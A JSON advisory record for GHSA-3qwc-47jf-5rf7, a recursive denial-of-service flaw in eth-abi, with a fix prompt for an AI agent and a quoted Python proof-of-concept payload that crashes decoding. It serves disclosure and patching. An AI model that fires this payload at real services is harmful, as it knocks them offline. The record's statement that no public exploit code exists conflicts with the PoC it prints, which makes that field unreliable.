{"answers":{"affected":"2 open source packages ship an affected version, including eth-abi.","exploited":"There is no known exploitation of GHSA-3qwc-47jf-5rf7 in the wild and no public exploit code.","fix":"Upgrade eth-abi to 5.0.1 or later.","what":"GHSA-3qwc-47jf-5rf7 is a denial of service vulnerability in eth-abi, published on 5 Mar 2024. An attacker can exploit it over the internet without logging in, with no action from the victim."},"fix_prompt":"Check this codebase for GHSA-3qwc-47jf-5rf7 and fix it if it is affected.\n\nWhat it is: GHSA-3qwc-47jf-5rf7 is a denial of service vulnerability in eth-abi, published on 5 Mar 2024. An attacker can exploit it over the internet without logging in, with no action from the victim.\nExploitation: There is no known exploitation of GHSA-3qwc-47jf-5rf7 in the wild and no public exploit code.\n\nAffected packages and fixed versions:\n- eth-abi (PyPI): affected all versions; fixed in 5.0.1\n- eth-abi (PyPI): affected all versions; fixed in 5.0.1\n\nTask:\n1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.\n2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.\n3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.\n4. Run the tests and summarise what changed and why.\n5. If nothing in the project is affected, say so and change nothing.\n\nReference: https://insights.sbomify.com/GHSA-3qwc-47jf-5rf7/ (Markdown: https://insights.sbomify.com/GHSA-3qwc-47jf-5rf7/index.md)","id":"GHSA-3qwc-47jf-5rf7","markdown":"https://insights.sbomify.com/GHSA-3qwc-47jf-5rf7/index.md","name":"GHSA-3qwc-47jf-5rf7","record":{"aliases":[],"analysis":{"component_type":"library","fix_type":"upgrade","impacts":["denial_of_service"],"network_reachable":"yes","non_default_config":false,"product_category":"Python ABI decoding library","requires_auth":"none","summary":"An attacker can cause a denial of service in eth-abi by providing crafted input that triggers excessive recursion during decoding.","user_interaction":"not_required","vuln_class":"denial_of_service"},"analysis_generated_by":"qwen3.8-flash-next","assigner":null,"cpe":[],"cvss":{"score":null,"severity":null,"source":null,"vector":null,"version":null},"cwes":[],"description":"This is related to recent ZST stuff (https://github.com/ethereum/eth-abi/security/advisories/GHSA-rqr8-pxh7-cq3g), but it's a different one. Basically a recursive pointer issue\n\n```py\nfrom eth_abi import decode\n\npayload = \"0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020\"\n\n# OverflowError: Python int too large to convert to C ssize_t\n#decode(['(uint256[][][][][][][][][][])'], bytearray.fromhex(payload))\n\ndecode(['uint256[][][][][][][][][][]'], bytearray.fromhex(payload+('00' * 1024)))\n```","ecosystems":["PyPI"],"exploits":{"exploitdb":null,"first_seen":null,"github_poc":null,"max_poc_stars":null,"metasploit":null,"nuclei":null,"refs":[],"tier":null},"has_fix":true,"headline":"eth-abi is vulnerable to recursive DoS","id":"GHSA-3qwc-47jf-5rf7","indexable":true,"kev":null,"kind":"advisory","links":{"ecosystem":"PyPI","product":null,"products":[],"type":"denial_of_service","year":"2024"},"n_packages":2,"n_references":null,"packages":[{"ecosystem":"PyPI","fixed":["5.0.1"],"introduced":["0"],"last_affected":[],"package":"eth-abi","purl":null,"source":"GHSA-3qwc-47jf-5rf7"},{"ecosystem":"PyPI","fixed":["5.0.1"],"introduced":["0"],"last_affected":[],"package":"eth-abi","purl":"pkg:pypi/eth-abi","source":"GHSA-3qwc-47jf-5rf7"}],"products":null,"published":"2024-03-05","related":[],"sources":[{"class":"attribution","licence":"CC BY 4.0","name":"GitHub Advisory Database","prefix":"GHSA"}],"ssvc":{"automatable":null,"exploitation":null,"technical_impact":null},"state":null,"updated":null,"vendors":null},"summary":"An attacker can cause a denial of service in eth-abi by providing crafted input that triggers excessive recursion during decoding.","url":"https://insights.sbomify.com/GHSA-3qwc-47jf-5rf7/"}